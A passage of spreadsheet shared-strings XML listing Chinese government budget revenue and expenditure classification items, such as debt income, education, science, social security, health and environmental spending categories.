    <t xml:space="preserve">      干部教育</t>
  </si>
  <si>
    <t xml:space="preserve">     其他国有资本经营预算企业产权转让收入</t>
  </si>
  <si>
    <t xml:space="preserve">      培训支出</t>
  </si>
  <si>
    <t xml:space="preserve">  清算收入</t>
  </si>
  <si>
    <t xml:space="preserve">      退役士兵能力提升</t>
  </si>
  <si>
    <t xml:space="preserve">     国有股权、股份清算收入</t>
  </si>
  <si>
    <t xml:space="preserve">      其他进修及培训</t>
  </si>
  <si>
    <t xml:space="preserve">     国有独资企业清算收入</t>
  </si>
  <si>
    <t xml:space="preserve">    教育费附加安排的支出</t>
  </si>
  <si>
    <t xml:space="preserve">     其他国有资本经营预算企业清算收入</t>
  </si>
  <si>
    <t xml:space="preserve">      农村中小学校舍建设</t>
  </si>
  <si>
    <t xml:space="preserve">  其他国有资本经营预算收入</t>
  </si>
  <si>
    <t xml:space="preserve">      农村中小学教学设施</t>
  </si>
  <si>
    <t xml:space="preserve">      城市中小学校舍建设</t>
  </si>
  <si>
    <t>债务收入</t>
  </si>
  <si>
    <t xml:space="preserve">      城市中小学教学设施</t>
  </si>
  <si>
    <t xml:space="preserve">   中央政府债务收入</t>
  </si>
  <si>
    <t xml:space="preserve">      中等职业学校教学设施</t>
  </si>
  <si>
    <t xml:space="preserve">     中央政府国内债务收入</t>
  </si>
  <si>
    <t xml:space="preserve">      其他教育费附加安排的支出</t>
  </si>
  <si>
    <t xml:space="preserve">     中央政府国外债务收入</t>
  </si>
  <si>
    <t xml:space="preserve">    其他教育支出</t>
  </si>
  <si>
    <t xml:space="preserve">        中央政府境外发行主权债券收入</t>
  </si>
  <si>
    <t xml:space="preserve">      其他教育支出</t>
  </si>
  <si>
    <t xml:space="preserve">        中央政府向外国政府借款收入</t>
  </si>
  <si>
    <t xml:space="preserve">  科学技术支出</t>
  </si>
  <si>
    <t xml:space="preserve">        中央政府向国际组织借款收入</t>
  </si>
  <si>
    <t xml:space="preserve">    科学技术管理事务</t>
  </si>
  <si>
    <t xml:space="preserve">        中央政府其他国外借款收入</t>
  </si>
  <si>
    <t xml:space="preserve">   地方政府债务收入</t>
  </si>
  <si>
    <t xml:space="preserve">     一般债务收入</t>
  </si>
  <si>
    <t xml:space="preserve">        地方政府一般债券收入</t>
  </si>
  <si>
    <t xml:space="preserve">      其他科学技术管理事务支出</t>
  </si>
  <si>
    <t xml:space="preserve">        地方政府向外国政府借款收入</t>
  </si>
  <si>
    <t xml:space="preserve">    基础研究</t>
  </si>
  <si>
    <t xml:space="preserve">        地方政府向国际组织借款收入</t>
  </si>
  <si>
    <t xml:space="preserve">      机构运行</t>
  </si>
  <si>
    <t xml:space="preserve">        地方政府其他一般债务收入</t>
  </si>
  <si>
    <t xml:space="preserve">      自然科学基金</t>
  </si>
  <si>
    <t xml:space="preserve">     专项债务收入</t>
  </si>
  <si>
    <t xml:space="preserve">      实验室及相关设施</t>
  </si>
  <si>
    <t xml:space="preserve">        海南省高等级公路车辆通行附加费债务收入</t>
  </si>
  <si>
    <t xml:space="preserve">      重大科学工程</t>
  </si>
  <si>
    <t xml:space="preserve">        港口建设费债务收入</t>
  </si>
  <si>
    <t xml:space="preserve">      专项基础科研</t>
  </si>
  <si>
    <t xml:space="preserve">        国家电影事业发展专项资金债务收入</t>
  </si>
  <si>
    <t xml:space="preserve">      专项技术基础</t>
  </si>
  <si>
    <t xml:space="preserve">        国有土地使用权出让金债务收入</t>
  </si>
  <si>
    <t xml:space="preserve">      科技人才队伍建设</t>
  </si>
  <si>
    <t xml:space="preserve">        农业土地开发资金债务收入</t>
  </si>
  <si>
    <t xml:space="preserve">      其他基础研究支出</t>
  </si>
  <si>
    <t xml:space="preserve">        大中型水库库区基金债务收入</t>
  </si>
  <si>
    <t xml:space="preserve">    应用研究</t>
  </si>
  <si>
    <t xml:space="preserve">        城市基础设施配套费债务收入</t>
  </si>
  <si>
    <t xml:space="preserve">        小型水库移民扶助基金债务收入</t>
  </si>
  <si>
    <t xml:space="preserve">      社会公益研究</t>
  </si>
  <si>
    <t xml:space="preserve">        国家重大水利工程建设基金债务收入</t>
  </si>
  <si>
    <t xml:space="preserve">      高技术研究</t>
  </si>
  <si>
    <t xml:space="preserve">        车辆通行费债务收入</t>
  </si>
  <si>
    <t xml:space="preserve">      专项科研试制</t>
  </si>
  <si>
    <t xml:space="preserve">        污水处理费债务收入</t>
  </si>
  <si>
    <t xml:space="preserve">      其他应用研究支出</t>
  </si>
  <si>
    <t xml:space="preserve">        土地储备专项债券收入</t>
  </si>
  <si>
    <t xml:space="preserve">    技术研究与开发</t>
  </si>
  <si>
    <t xml:space="preserve">        政府收费公路专项债券收入</t>
  </si>
  <si>
    <t xml:space="preserve">        棚户区改造专项债券收入</t>
  </si>
  <si>
    <t xml:space="preserve">      科技成果转化与扩散</t>
  </si>
  <si>
    <t xml:space="preserve">        其他地方自行试点项目收益专项债券收入</t>
  </si>
  <si>
    <t xml:space="preserve">      共性技术研究与开发</t>
  </si>
  <si>
    <t xml:space="preserve">        其他政府性基金债务收入</t>
  </si>
  <si>
    <t xml:space="preserve">      其他技术研究与开发支出</t>
  </si>
  <si>
    <t xml:space="preserve">    科技条件与服务</t>
  </si>
  <si>
    <t xml:space="preserve">      技术创新服务体系</t>
  </si>
  <si>
    <t xml:space="preserve">      科技条件专项</t>
  </si>
  <si>
    <t xml:space="preserve">      其他科技条件与服务支出</t>
  </si>
  <si>
    <t xml:space="preserve">    社会科学</t>
  </si>
  <si>
    <t>附表:(填报说明另发)</t>
  </si>
  <si>
    <t xml:space="preserve">      社会科学研究机构</t>
  </si>
  <si>
    <t>科目1</t>
  </si>
  <si>
    <t xml:space="preserve">      社会科学研究</t>
  </si>
  <si>
    <t>科目2</t>
  </si>
  <si>
    <t xml:space="preserve">      社科基金支出</t>
  </si>
  <si>
    <t>科目3</t>
  </si>
  <si>
    <t xml:space="preserve">      其他社会科学支出</t>
  </si>
  <si>
    <t>科目4</t>
  </si>
  <si>
    <t xml:space="preserve">    科学技术普及</t>
  </si>
  <si>
    <t>科目5</t>
  </si>
  <si>
    <t>科目6</t>
  </si>
  <si>
    <t xml:space="preserve">      科普活动</t>
  </si>
  <si>
    <t>科目7</t>
  </si>
  <si>
    <t xml:space="preserve">      青少年科技活动</t>
  </si>
  <si>
    <t>科目8</t>
  </si>
  <si>
    <t xml:space="preserve">      学术交流活动</t>
  </si>
  <si>
    <t>科目9</t>
  </si>
  <si>
    <t xml:space="preserve">      科技馆站</t>
  </si>
  <si>
    <t>科目10</t>
  </si>
  <si>
    <t xml:space="preserve">      其他科学技术普及支出</t>
  </si>
  <si>
    <t>科目11</t>
  </si>
  <si>
    <t xml:space="preserve">    科技交流与合作</t>
  </si>
  <si>
    <t>科目12</t>
  </si>
  <si>
    <t xml:space="preserve">      国际交流与合作</t>
  </si>
  <si>
    <t>科目13</t>
  </si>
  <si>
    <t xml:space="preserve">      重大科技合作项目</t>
  </si>
  <si>
    <t>科目14</t>
  </si>
  <si>
    <t xml:space="preserve">      其他科技交流与合作支出</t>
  </si>
  <si>
    <t>科目15</t>
  </si>
  <si>
    <t xml:space="preserve">    科技重大项目</t>
  </si>
  <si>
    <t>科目16</t>
  </si>
  <si>
    <t xml:space="preserve">      科技重大专项</t>
  </si>
  <si>
    <t>科目17</t>
  </si>
  <si>
    <t xml:space="preserve">      重点研发计划</t>
  </si>
  <si>
    <t>科目18</t>
  </si>
  <si>
    <t xml:space="preserve">      其他科技重大项目</t>
  </si>
  <si>
    <t>科目19</t>
  </si>
  <si>
    <t xml:space="preserve">    其他科学技术支出</t>
  </si>
  <si>
    <t>科目20</t>
  </si>
  <si>
    <t xml:space="preserve">      科技奖励</t>
  </si>
  <si>
    <t>科目21</t>
  </si>
  <si>
    <t xml:space="preserve">      核应急</t>
  </si>
  <si>
    <t>科目22</t>
  </si>
  <si>
    <t xml:space="preserve">      转制科研机构</t>
  </si>
  <si>
    <t>科目23</t>
  </si>
  <si>
    <t xml:space="preserve">      其他科学技术支出</t>
  </si>
  <si>
    <t>科目24</t>
  </si>
  <si>
    <t xml:space="preserve">  文化旅游体育与传媒支出</t>
  </si>
  <si>
    <t>科目25</t>
  </si>
  <si>
    <t xml:space="preserve">    文化和旅游</t>
  </si>
  <si>
    <t>科目26</t>
  </si>
  <si>
    <t>科目27</t>
  </si>
  <si>
    <t>科目28</t>
  </si>
  <si>
    <t>科目29</t>
  </si>
  <si>
    <t xml:space="preserve">      图书馆</t>
  </si>
  <si>
    <t>科目30</t>
  </si>
  <si>
    <t xml:space="preserve">      文化展示及纪念机构</t>
  </si>
  <si>
    <t xml:space="preserve">      艺术表演场所</t>
  </si>
  <si>
    <t xml:space="preserve">      艺术表演团体</t>
  </si>
  <si>
    <t xml:space="preserve">      文化活动</t>
  </si>
  <si>
    <t xml:space="preserve">      群众文化</t>
  </si>
  <si>
    <t xml:space="preserve">      文化和旅游交流与合作</t>
  </si>
  <si>
    <t xml:space="preserve">      文化创作与保护</t>
  </si>
  <si>
    <t xml:space="preserve">      文化和旅游市场管理</t>
  </si>
  <si>
    <t xml:space="preserve">      旅游宣传</t>
  </si>
  <si>
    <t xml:space="preserve">      文化和旅游管理事务</t>
  </si>
  <si>
    <t xml:space="preserve">      其他文化和旅游支出</t>
  </si>
  <si>
    <t xml:space="preserve">    文物</t>
  </si>
  <si>
    <t xml:space="preserve">      文物保护</t>
  </si>
  <si>
    <t xml:space="preserve">      博物馆</t>
  </si>
  <si>
    <t xml:space="preserve">      历史名城与古迹</t>
  </si>
  <si>
    <t xml:space="preserve">      其他文物支出</t>
  </si>
  <si>
    <t xml:space="preserve">    体育</t>
  </si>
  <si>
    <t xml:space="preserve">      运动项目管理</t>
  </si>
  <si>
    <t xml:space="preserve">      体育竞赛</t>
  </si>
  <si>
    <t xml:space="preserve">      体育训练</t>
  </si>
  <si>
    <t xml:space="preserve">      体育场馆</t>
  </si>
  <si>
    <t xml:space="preserve">      群众体育</t>
  </si>
  <si>
    <t xml:space="preserve">      体育交流与合作</t>
  </si>
  <si>
    <t xml:space="preserve">      其他体育支出</t>
  </si>
  <si>
    <t xml:space="preserve">    新闻出版电影</t>
  </si>
  <si>
    <t xml:space="preserve">      新闻通讯</t>
  </si>
  <si>
    <t xml:space="preserve">      出版发行</t>
  </si>
  <si>
    <t xml:space="preserve">      版权管理</t>
  </si>
  <si>
    <t xml:space="preserve">      电影</t>
  </si>
  <si>
    <t xml:space="preserve">      其他新闻出版电影支出</t>
  </si>
  <si>
    <t xml:space="preserve">    广播电视</t>
  </si>
  <si>
    <t xml:space="preserve">      监测监管</t>
  </si>
  <si>
    <t xml:space="preserve">      传输发射</t>
  </si>
  <si>
    <t xml:space="preserve">      广播电视事务</t>
  </si>
  <si>
    <t xml:space="preserve">      其他广播电视支出</t>
  </si>
  <si>
    <t xml:space="preserve">    其他文化旅游体育与传媒支出</t>
  </si>
  <si>
    <t xml:space="preserve">      宣传文化发展专项支出</t>
  </si>
  <si>
    <t xml:space="preserve">      文化产业发展专项支出</t>
  </si>
  <si>
    <t xml:space="preserve">      其他文化旅游体育与传媒支出</t>
  </si>
  <si>
    <t xml:space="preserve">  社会保障和就业支出</t>
  </si>
  <si>
    <t xml:space="preserve">    人力资源和社会保障管理事务</t>
  </si>
  <si>
    <t xml:space="preserve">      综合业务管理</t>
  </si>
  <si>
    <t xml:space="preserve">      劳动保障监察</t>
  </si>
  <si>
    <t xml:space="preserve">      就业管理事务</t>
  </si>
  <si>
    <t xml:space="preserve">      社会保险业务管理事务</t>
  </si>
  <si>
    <t xml:space="preserve">      社会保险经办机构</t>
  </si>
  <si>
    <t xml:space="preserve">      劳动关系和维权</t>
  </si>
  <si>
    <t xml:space="preserve">      公共就业服务和职业技能鉴定机构</t>
  </si>
  <si>
    <t xml:space="preserve">      劳动人事争议调解仲裁</t>
  </si>
  <si>
    <t xml:space="preserve">      政府特殊津贴</t>
  </si>
  <si>
    <t xml:space="preserve">      资助留学回国人员</t>
  </si>
  <si>
    <t xml:space="preserve">      博士后日常经费</t>
  </si>
  <si>
    <t xml:space="preserve">      引进人才费用</t>
  </si>
  <si>
    <t xml:space="preserve">      其他人力资源和社会保障管理事务支出</t>
  </si>
  <si>
    <t xml:space="preserve">    民政管理事务</t>
  </si>
  <si>
    <t xml:space="preserve">      社会组织管理</t>
  </si>
  <si>
    <t xml:space="preserve">      行政区划和地名管理</t>
  </si>
  <si>
    <t xml:space="preserve">      基层政权建设和社区治理</t>
  </si>
  <si>
    <t xml:space="preserve">      其他民政管理事务支出</t>
  </si>
  <si>
    <t xml:space="preserve">    补充全国社会保障基金</t>
  </si>
  <si>
    <t xml:space="preserve">      用一般公共预算补充基金</t>
  </si>
  <si>
    <t xml:space="preserve">    行政事业单位养老支出</t>
  </si>
  <si>
    <t xml:space="preserve">      行政单位离退休</t>
  </si>
  <si>
    <t xml:space="preserve">      事业单位离退休</t>
  </si>
  <si>
    <t xml:space="preserve">      离退休人员管理机构</t>
  </si>
  <si>
    <t xml:space="preserve">      机关事业单位基本养老保险缴费支出</t>
  </si>
  <si>
    <t xml:space="preserve">      机关事业单位职业年金缴费支出</t>
  </si>
  <si>
    <t xml:space="preserve">      对机关事业单位基本养老保险基金的补助</t>
  </si>
  <si>
    <t xml:space="preserve">      对机关事业单位职业年金的补助</t>
  </si>
  <si>
    <t xml:space="preserve">      其他行政事业单位养老支出</t>
  </si>
  <si>
    <t xml:space="preserve">    企业改革补助</t>
  </si>
  <si>
    <t xml:space="preserve">      企业关闭破产补助</t>
  </si>
  <si>
    <t xml:space="preserve">      厂办大集体改革补助</t>
  </si>
  <si>
    <t xml:space="preserve">      其他企业改革发展补助</t>
  </si>
  <si>
    <t xml:space="preserve">    就业补助</t>
  </si>
  <si>
    <t xml:space="preserve">      就业创业服务补贴</t>
  </si>
  <si>
    <t xml:space="preserve">      职业培训补贴</t>
  </si>
  <si>
    <t xml:space="preserve">      社会保险补贴</t>
  </si>
  <si>
    <t xml:space="preserve">      公益性岗位补贴</t>
  </si>
  <si>
    <t xml:space="preserve">      职业技能鉴定补贴</t>
  </si>
  <si>
    <t xml:space="preserve">      就业见习补贴</t>
  </si>
  <si>
    <t xml:space="preserve">      高技能人才培养补助</t>
  </si>
  <si>
    <t xml:space="preserve">      促进创业补贴</t>
  </si>
  <si>
    <t xml:space="preserve">      其他就业补助支出</t>
  </si>
  <si>
    <t xml:space="preserve">    抚恤</t>
  </si>
  <si>
    <t xml:space="preserve">      死亡抚恤</t>
  </si>
  <si>
    <t xml:space="preserve">      伤残抚恤</t>
  </si>
  <si>
    <t xml:space="preserve">      在乡复员、退伍军人生活补助</t>
  </si>
  <si>
    <t xml:space="preserve">      优抚事业单位支出</t>
  </si>
  <si>
    <t xml:space="preserve">      义务兵优待</t>
  </si>
  <si>
    <t xml:space="preserve">      农村籍退役士兵老年生活补助</t>
  </si>
  <si>
    <t xml:space="preserve">      其他优抚支出</t>
  </si>
  <si>
    <t xml:space="preserve">    退役安置</t>
  </si>
  <si>
    <t xml:space="preserve">      退役士兵安置</t>
  </si>
  <si>
    <t xml:space="preserve">      军队移交政府的离退休人员安置</t>
  </si>
  <si>
    <t xml:space="preserve">      军队移交政府离退休干部管理机构</t>
  </si>
  <si>
    <t xml:space="preserve">      退役士兵管理教育</t>
  </si>
  <si>
    <t xml:space="preserve">      军队转业干部安置</t>
  </si>
  <si>
    <t xml:space="preserve">      其他退役安置支出</t>
  </si>
  <si>
    <t xml:space="preserve">    社会福利</t>
  </si>
  <si>
    <t xml:space="preserve">      儿童福利</t>
  </si>
  <si>
    <t xml:space="preserve">      老年福利</t>
  </si>
  <si>
    <t xml:space="preserve">      康复辅具</t>
  </si>
  <si>
    <t xml:space="preserve">      殡葬</t>
  </si>
  <si>
    <t xml:space="preserve">      社会福利事业单位</t>
  </si>
  <si>
    <t xml:space="preserve">      养老服务</t>
  </si>
  <si>
    <t xml:space="preserve">      其他社会福利支出</t>
  </si>
  <si>
    <t xml:space="preserve">    残疾人事业</t>
  </si>
  <si>
    <t xml:space="preserve">      残疾人康复</t>
  </si>
  <si>
    <t xml:space="preserve">      残疾人就业和扶贫</t>
  </si>
  <si>
    <t xml:space="preserve">      残疾人体育</t>
  </si>
  <si>
    <t xml:space="preserve">      残疾人生活和护理补贴</t>
  </si>
  <si>
    <t xml:space="preserve">      其他残疾人事业支出</t>
  </si>
  <si>
    <t xml:space="preserve">    红十字事业</t>
  </si>
  <si>
    <t xml:space="preserve">      其他红十字事业支出</t>
  </si>
  <si>
    <t xml:space="preserve">    最低生活保障</t>
  </si>
  <si>
    <t xml:space="preserve">      城市最低生活保障金支出</t>
  </si>
  <si>
    <t xml:space="preserve">      农村最低生活保障金支出</t>
  </si>
  <si>
    <t xml:space="preserve">    临时救助</t>
  </si>
  <si>
    <t xml:space="preserve">      临时救助支出</t>
  </si>
  <si>
    <t xml:space="preserve">      流浪乞讨人员救助支出</t>
  </si>
  <si>
    <t xml:space="preserve">    特困人员救助供养</t>
  </si>
  <si>
    <t xml:space="preserve">      城市特困人员救助供养支出</t>
  </si>
  <si>
    <t xml:space="preserve">      农村特困人员救助供养支出</t>
  </si>
  <si>
    <t xml:space="preserve">    补充道路交通事故社会救助基金</t>
  </si>
  <si>
    <t xml:space="preserve">      交强险增值税补助基金支出</t>
  </si>
  <si>
    <t xml:space="preserve">      交强险罚款收入补助基金支出</t>
  </si>
  <si>
    <t xml:space="preserve">    其他生活救助</t>
  </si>
  <si>
    <t xml:space="preserve">      其他城市生活救助</t>
  </si>
  <si>
    <t xml:space="preserve">      其他农村生活救助</t>
  </si>
  <si>
    <t xml:space="preserve">    财政对基本养老保险基金的补助</t>
  </si>
  <si>
    <t xml:space="preserve">      财政对企业职工基本养老保险基金的补助</t>
  </si>
  <si>
    <t xml:space="preserve">      财政对城乡居民基本养老保险基金的补助</t>
  </si>
  <si>
    <t xml:space="preserve">      财政对其他基本养老保险基金的补助</t>
  </si>
  <si>
    <t xml:space="preserve">    财政对其他社会保险基金的补助</t>
  </si>
  <si>
    <t xml:space="preserve">      财政对失业保险基金的补助</t>
  </si>
  <si>
    <t xml:space="preserve">      财政对工伤保险基金的补助</t>
  </si>
  <si>
    <t xml:space="preserve">      其他财政对社会保险基金的补助</t>
  </si>
  <si>
    <t xml:space="preserve">    退役军人管理事务</t>
  </si>
  <si>
    <t xml:space="preserve">      拥军优属</t>
  </si>
  <si>
    <t xml:space="preserve">      部队供应</t>
  </si>
  <si>
    <t xml:space="preserve">      其他退役军人事务管理支出</t>
  </si>
  <si>
    <t xml:space="preserve">    财政代缴社会保险费支出</t>
  </si>
  <si>
    <t xml:space="preserve">      财政代缴城乡居民基本养老保险费支出</t>
  </si>
  <si>
    <t xml:space="preserve">      财政代缴其他社会保险费支出</t>
  </si>
  <si>
    <t xml:space="preserve">    其他社会保障和就业支出</t>
  </si>
  <si>
    <t xml:space="preserve">      其他社会保障和就业支出</t>
  </si>
  <si>
    <t xml:space="preserve">  卫生健康支出</t>
  </si>
  <si>
    <t xml:space="preserve">    卫生健康管理事务</t>
  </si>
  <si>
    <t xml:space="preserve">      其他卫生健康管理事务支出</t>
  </si>
  <si>
    <t xml:space="preserve">    公立医院</t>
  </si>
  <si>
    <t xml:space="preserve">      综合医院</t>
  </si>
  <si>
    <t xml:space="preserve">      中医(民族)医院</t>
  </si>
  <si>
    <t xml:space="preserve">      传染病医院</t>
  </si>
  <si>
    <t xml:space="preserve">      职业病防治医院</t>
  </si>
  <si>
    <t xml:space="preserve">      精神病医院</t>
  </si>
  <si>
    <t xml:space="preserve">      妇幼保健医院</t>
  </si>
  <si>
    <t xml:space="preserve">      儿童医院</t>
  </si>
  <si>
    <t xml:space="preserve">      其他专科医院</t>
  </si>
  <si>
    <t xml:space="preserve">      福利医院</t>
  </si>
  <si>
    <t xml:space="preserve">      行业医院</t>
  </si>
  <si>
    <t xml:space="preserve">      处理医疗欠费</t>
  </si>
  <si>
    <t xml:space="preserve">      康复医院</t>
  </si>
  <si>
    <t xml:space="preserve">      其他公立医院支出</t>
  </si>
  <si>
    <t xml:space="preserve">    基层医疗卫生机构</t>
  </si>
  <si>
    <t xml:space="preserve">      城市社区卫生机构</t>
  </si>
  <si>
    <t xml:space="preserve">      乡镇卫生院</t>
  </si>
  <si>
    <t xml:space="preserve">      其他基层医疗卫生机构支出</t>
  </si>
  <si>
    <t xml:space="preserve">    公共卫生</t>
  </si>
  <si>
    <t xml:space="preserve">      疾病预防控制机构</t>
  </si>
  <si>
    <t xml:space="preserve">      卫生监督机构</t>
  </si>
  <si>
    <t xml:space="preserve">      妇幼保健机构</t>
  </si>
  <si>
    <t xml:space="preserve">      精神卫生机构</t>
  </si>
  <si>
    <t xml:space="preserve">      应急救治机构</t>
  </si>
  <si>
    <t xml:space="preserve">      采供血机构</t>
  </si>
  <si>
    <t xml:space="preserve">      其他专业公共卫生机构</t>
  </si>
  <si>
    <t xml:space="preserve">      基本公共卫生服务</t>
  </si>
  <si>
    <t xml:space="preserve">      重大公共卫生服务</t>
  </si>
  <si>
    <t xml:space="preserve">      突发公共卫生事件应急处理</t>
  </si>
  <si>
    <t xml:space="preserve">      其他公共卫生支出</t>
  </si>
  <si>
    <t xml:space="preserve">    中医药</t>
  </si>
  <si>
    <t xml:space="preserve">      中医(民族医)药专项</t>
  </si>
  <si>
    <t xml:space="preserve">      其他中医药支出</t>
  </si>
  <si>
    <t xml:space="preserve">    计划生育事务</t>
  </si>
  <si>
    <t xml:space="preserve">      计划生育机构</t>
  </si>
  <si>
    <t xml:space="preserve">      计划生育服务</t>
  </si>
  <si>
    <t xml:space="preserve">      其他计划生育事务支出</t>
  </si>
  <si>
    <t xml:space="preserve">    行政事业单位医疗</t>
  </si>
  <si>
    <t xml:space="preserve">      行政单位医疗</t>
  </si>
  <si>
    <t xml:space="preserve">      事业单位医疗</t>
  </si>
  <si>
    <t xml:space="preserve">      公务员医疗补助</t>
  </si>
  <si>
    <t xml:space="preserve">      其他行政事业单位医疗支出</t>
  </si>
  <si>
    <t xml:space="preserve">    财政对基本医疗保险基金的补助</t>
  </si>
  <si>
    <t xml:space="preserve">      财政对职工基本医疗保险基金的补助</t>
  </si>
  <si>
    <t xml:space="preserve">      财政对城乡居民基本医疗保险基金的补助</t>
  </si>
  <si>
    <t xml:space="preserve">      财政对其他基本医疗保险基金的补助</t>
  </si>
  <si>
    <t xml:space="preserve">    医疗救助</t>
  </si>
  <si>
    <t xml:space="preserve">      城乡医疗救助</t>
  </si>
  <si>
    <t xml:space="preserve">      疾病应急救助</t>
  </si>
  <si>
    <t xml:space="preserve">      其他医疗救助支出</t>
  </si>
  <si>
    <t xml:space="preserve">    优抚对象医疗</t>
  </si>
  <si>
    <t xml:space="preserve">      优抚对象医疗补助</t>
  </si>
  <si>
    <t xml:space="preserve">      其他优抚对象医疗支出</t>
  </si>
  <si>
    <t xml:space="preserve">    医疗保障管理事务</t>
  </si>
  <si>
    <t xml:space="preserve">      医疗保障政策管理</t>
  </si>
  <si>
    <t xml:space="preserve">      医疗保障经办事务</t>
  </si>
  <si>
    <t xml:space="preserve">      其他医疗保障管理事务支出</t>
  </si>
  <si>
    <t xml:space="preserve">    老龄卫生健康事务</t>
  </si>
  <si>
    <t xml:space="preserve">      老龄卫生健康事务</t>
  </si>
  <si>
    <t xml:space="preserve">    其他卫生健康支出</t>
  </si>
  <si>
    <t xml:space="preserve">      其他卫生健康支出</t>
  </si>
  <si>
    <t xml:space="preserve">  节能环保支出</t>
  </si>
  <si>
    <t xml:space="preserve">    环境保护管理事务</t>
  </si>
  <si>
    <t xml:space="preserve">      生态环境保护宣传</t>
  </si>
  <si>
    <t xml:space="preserve">      环境保护法规、规划及标准</t>
  </si>
  <si>
    <t xml:space="preserve">      生态环境国际合作及履约</t>
  </si>
  <si>
    <t xml:space="preserve">      生态环境保护行政许可</t>
  </si>
  <si>
    <t xml:space="preserve">      应对气候变化管理事务</t>
  </si>
  <si>
    <t xml:space="preserve">      其他环境保护管理事务支出</t>
  </si>
  <si>
    <t xml:space="preserve">    环境监测与监察</t>
  </si>
  <si>
    <t xml:space="preserve">      建设项目环评审查与监督</t>
  </si>
  <si>
    <t xml:space="preserve">      核与辐射安全监督</t>
  </si>
  <si>
    <t xml:space="preserve">      其他环境监测与监察支出</t>
  </si>
  <si>
    <t xml:space="preserve">    污染防治</t>
  </si>
  <si>
    <t xml:space="preserve">      大气</t>
  </si>
  <si>
    <t xml:space="preserve">      水体</t>
  </si>
  <si>
    <t xml:space="preserve">      噪声</t>
  </si>
  <si>
    <t xml:space="preserve">      固体废弃物与化学品</t>
  </si>
  <si>
    <t xml:space="preserve">      放射源和放射性废物监管</t>
  </si>
  <si>
    <t xml:space="preserve">      辐射</t>
  </si>
  <si>
    <t xml:space="preserve">      土壤</t>
  </si>
  <si>
    <t xml:space="preserve">      其他污染防治支出</t>
  </si>
  <si>
    <t xml:space="preserve">    自然生态保护</t>
  </si>
  <si>
    <t xml:space="preserve">      生态保护</t>
  </si>
  <si>
    <t xml:space="preserve">      农村环境保护</t>
  </si>
  <si>
    <t xml:space="preserve">      生物及物种资源保护</t>
  </si>
  <si>
    <t xml:space="preserve">      其他自然生态保护支出</t>
  </si>
  <si>
    <t xml:space="preserve">    天然林保护</t>
  </si>
  <si>
    <t xml:space="preserve">      森林管护</t>
  </si>
  <si>
    <t xml:space="preserve">      社会保险补助</t>
  </si>
  <si>
    <t xml:space="preserve">      政策性社会性支出补助</t>
  </si>
  <si>
    <t xml:space="preserve">      天然林保护工程建设 </t>
  </si>
  <si>
    <t xml:space="preserve">      停伐补助</t>
  </si>
  <si>
    <t xml:space="preserve">      其他天然林保护支出</t>
  </si>
  <si>
    <t xml:space="preserve">    退耕还林还草</t>
  </si>
  <si>
    <t xml:space="preserve">      退耕现金</t>
  </si>
  <si>
    <t xml:space="preserve">      退耕还林粮食折现补贴</t>
  </si>
  <si>
    <t xml:space="preserve">      退耕还林粮食费用补贴</t>
  </si>
  <si>
    <t xml:space="preserve">      退耕还林工程建设</t>
  </si>
  <si>
    <t xml:space="preserve">      其他退耕还林还草支出</t>
  </si>
  <si>
    <t xml:space="preserve">    风沙荒漠治理</t>
  </si>
  <si>
    <t xml:space="preserve">      京津风沙源治理工程建设</t>
  </si>
  <si>
    <t xml:space="preserve">      其他风沙荒漠治理支出</t>
  </si>
  <si>
    <t xml:space="preserve">    退牧还草</t>
  </si>
  <si>
    <t xml:space="preserve">      退牧还草工程建设</t>
  </si>
  <si>
    <t xml:space="preserve">      其他退牧还草支出</t>
  </si>
  <si>
    <t xml:space="preserve">    已垦草原退耕还草</t>
  </si>
  <si>
    <t xml:space="preserve">      已垦草原退耕还草</t>
  </si>
  <si>
    <t xml:space="preserve">    能源节约利用</t>
  </si>
  <si>
    <t xml:space="preserve">      能源节约利用</t>
  </si>
  <si>
    <t xml:space="preserve">    污染减排</t>
  </si>
  <si>
    <t xml:space="preserve">      生态环境监测与信息</t>
  </si>
  <si>
    <t xml:space="preserve">      生态环境执法监察</t>
  </si>
  <si>
    <t xml:space="preserve">      减排专项支出</t>
  </si>
  <si>
    <t xml:space="preserve">      清洁生产专项支出</t>
  </si>
  <si>
    <t xml:space="preserve">      其他污染减排支出</t>
  </si>
  <si>
    <t xml:space="preserve">    可再生能源</t>
  </si>
  <si>
    <t xml:space="preserve">      可再生能源</t>
  </si>
  <si>
    <t xml:space="preserve">    循环经济</t>
  </si>
  <si>
    <t xml:space="preserve">      循环经济</t>
  </si>
  <si>
    <t xml:space="preserve">    能源管理事务</t>
  </si>
  <si>
    <t xml:space="preserve">      能源预测预警</t>
  </si>
  <si>
    <t xml:space="preserve">      能源战略规划与实施</t>
  </si>
  <si>
    <t xml:space="preserve">      能源科技装备</t>
  </si>
  <si>
    <t xml:space="preserve">      能源行业管理</t>
  </si>
  <si>
    <t xml:space="preserve">      能源管理</t>
  </si>
  <si>
    <t xml:space="preserve">      石油储备发展管理</t>
  </si>
  <si>
    <t xml:space="preserve">      能源调查</t>
  </si>
  <si>
    <t xml:space="preserve">      农村电网建设</t>
  </si>
  <si>
    <t xml:space="preserve">      其他能源管理事务支出</t>
  </si>
  <si>
    <t xml:space="preserve">    其他节能环保支出</t>
  </si>
  <si>
    <t xml:space="preserve">      其他节能环保支出</t>
  </si>
  <si>
    <t xml:space="preserve">  城乡社区支出</t>
  </si>
  <si>
    <t xml:space="preserve">    城乡社区管理事务</t>
  </si>
  <si>
    <t xml:space="preserve">      城管执法</t>
  </si>
  <si>
    <t xml:space="preserve">      工程建设标准规范编制与监管</t>
  </si>
  <si>
    <t xml:space="preserve">      工程建设管理</t>
  </si>
  <si>
    <t xml:space="preserve">      市政公用行业市场监管</t>
  </si>
  <si>
    <t xml:space="preserve">      住宅建设与房地产市场监管</t>
  </si>
  <si>
    <t xml:space="preserve">      执业资格注册、资质审查</t>
  </si>
  <si>
    <t xml:space="preserve">      其他城乡社区管理事务支出</t>
  </si>
  <si>
    <t xml:space="preserve">    城乡社区规划与管理</t>
  </si>
  <si>
    <t xml:space="preserve">      城乡社区规划与管理</t>
  </si>
  <si>
    <t xml:space="preserve">    城乡社区公共设施</t>
  </si>
  <si>
    <t xml:space="preserve">      小城镇基础设施建设</t>
  </si>
  <si>
    <t xml:space="preserve">      其他城乡社区公共设施支出</t>
  </si>
  <si>
    <t xml:space="preserve">    城乡社区环境卫生</t>
  </si>
  <si>
    <t xml:space="preserve">      城乡社区环境卫生</t>
  </si>
  <si>
    <t xml:space="preserve">    建设市场管理与监督</t>
  </si>
  <si>
    <t xml:space="preserve">      建设市场管理与监督</t>
  </si>
  <si>
    <t xml:space="preserve">    其他城乡社区支出</t>
  </si>
  <si>
